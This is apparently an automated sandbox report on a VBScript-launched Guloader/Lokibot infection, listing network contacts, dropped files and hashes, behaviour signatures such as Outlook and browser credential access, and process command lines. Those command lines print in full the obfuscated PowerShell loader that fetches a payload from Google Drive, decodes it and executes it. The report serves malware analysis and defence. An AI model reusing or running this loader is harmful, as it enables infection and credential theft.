/t kis1Nonpe2 bast1Intre. land0 vden ';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp

Files

memory/3060-4-0x000007FEF67FE000-0x000007FEF67FF000-memory.dmp

memory/3060-7-0x000007FEF6540000-0x000007FEF6EDD000-memory.dmp

memory/3060-9-0x000007FEF6540000-0x000007FEF6EDD000-memory.dmp

memory/3060-8-0x000007FEF6540000-0x000007FEF6EDD000-memory.dmp

memory/3060-11-0x000007FEF6540000-0x000007FEF6EDD000-memory.dmp

memory/3060-10-0x000007FEF6540000-0x000007FEF6EDD000-memory.dmp

memory/3060-6-0x0000000002240000-0x0000000002248000-memory.dmp

memory/3060-5-0x000000001B720000-0x000000001BA02000-memory.dmp

memory/3060-12-0x000007FEF67FE000-0x000007FEF67FF000-memory.dmp

memory/3060-14-0x000007FEF6540000-0x000007FEF6EDD000-memory.dmp

memory/3060-15-0x000007FEF6540000-0x000007FEF6EDD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WL6M4674514FHTGVWI6D.temp

MD5 cd49698584111bebc88fd5f9dea6106b
SHA1 8ccad272e75c516ddff0e95646843f8072200d94
SHA256 820f65a74c63a689adbce512aa166057551f9170a1fe4cbff1d78ab5b3086732
SHA512 10b501b2bd317acbd03bfcc4940e68516ed586ffd781bc3f9dc576be84daf7fe8c070eea04b75bdfb4daf9d18fe6cf9f5c99cd3264212339ed94225f714fba60

C:\Users\Admin\AppData\Roaming\Roborate.Uns

MD5 0b4940908143e7fa3180389a9b914557
SHA1 50985967f0dd7d2d8fdac35c66e6c066aba58aaf
SHA256 6e7664ac02af1fef33611b5150c64e285ca5c5bfda5bd555299c6df7b41f4d22
SHA512 eae1f4f22060ae85a31013cf9b904429e914018188eb519135e9ee747ff35b6a6426f665cd61cfb8724908658d11e80deb483901f4357c10cb5d207cb352e299

memory/2624-20-0x0000000006630000-0x00000000099D6000-memory.dmp

memory/2672-21-0x0000000000AF0000-0x0000000003E96000-memory.dmp

memory/2672-42-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2672-43-0x0000000000AF0000-0x0000000003E96000-memory.dmp

memory/3060-44-0x000007FEF6540000-0x000007FEF6EDD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-17 11:01

Reported

2024-09-17 11:03

Platform

win10v2004-20240802-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A beérkezett kérelem visszaigazolása.vbe"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4776 set thread context of 3664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4952 wrote to memory of 4976 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4952 wrote to memory of 4976 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 1948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 1948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 100 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 100 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 100 wrote to memory of 4776 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4776 wrote to memory of 1084 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4776 wrote to memory of 1084 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4776 wrote to memory of 1084 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4776 wrote to memory of 3664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4776 wrote to memory of 3664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4776 wrote to memory of 3664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4776 wrote to memory of 3664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 4776 wrote to memory of 3664 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A beérkezett kérelem visszaigazolása.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sulfamidic Gavelling Distributrnettet Torturingly Begunstige Confessionalism Crawley #>;$Ratebetalingsntercommunication='Humrforladtes';<#turnhalle Drouths Resistable Lighedspunkt Olu #>;$Ratebetalingsnteressefelt=$host.PrivateData;If ($Ratebetalingsnteressefelt) {$Didymitis++;}function Germania($Barnligt){$Citraternes142=$Barnligt.Length-$Didymitis;for( $Ratebetalings=5;$Ratebetalings -lt $Citraternes142;$Ratebetalings+=6){$Bladmaver+=$Barnligt[$Ratebetalings];}$Bladmaver;}function Talekanalen($Hjertebaandets){ & ($Remans) ($Hjertebaandets);}$Dermoreaction=Germania 'Fo urM He.toL giczCh lciSt yglmethol Sanda,xagg/Nonac5 ogn. Pole0ove.g Sa tl( HypoWS.mteiDruesnAfskidFremfo D giw SoubsSafir SkydeNKtterT,ylvt Inve1Lyso,0 lodt.Enami0Recur;Unrob Miz aWObl viMucednSilki6 Syre4Count;Fi ma ,eskxUdlej6Stnin4Catac;Perso Di.nfrUndisvSundh:Highh1U ion2Asy e1Tingh.Carra0Appr )Pikan .etsmGUdsaveMoistcForovk liosoForar/Unmil2Unpre0 ba a1Still0Swoon0T lre1Slage0 Ekse1 Aug ,utaFSubheiBr.ebrcholteHospif UartoKry,rxCofa /t kis1Nonpe2 bast1Intre. land0 vden ';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Sulfamidic Gavelling Distributrnettet Torturingly Begunstige Confessionalism Crawley #>;$Ratebetalingsntercommunication='Humrforladtes';<#turnhalle Drouths Resistable Lighedspunkt Olu #>;$Ratebetalingsnteressefelt=$host.PrivateData;If ($Ratebetalingsnteressefelt) {$Didymitis++;}function Germania($Barnligt){$Citraternes142=$Barnligt.Length-$Didymitis;for( $Ratebetalings=5;$Ratebetalings -lt $Citraternes142;$Ratebetalings+=6){$Bladmaver+=$Barnligt[$Ratebetalings];}$Bladmaver;}function Talekanalen($Hjertebaandets){ & ($Remans) ($Hjertebaandets);}$Dermoreaction=Germania 'Fo urM He.toL giczCh lciSt yglmethol Sanda,xagg/Nonac5 ogn. Pole0ove.g Sa tl( HypoWS.mteiDruesnAfskidFremfo D giw SoubsSafir SkydeNKtterT,ylvt Inve1Lyso,0 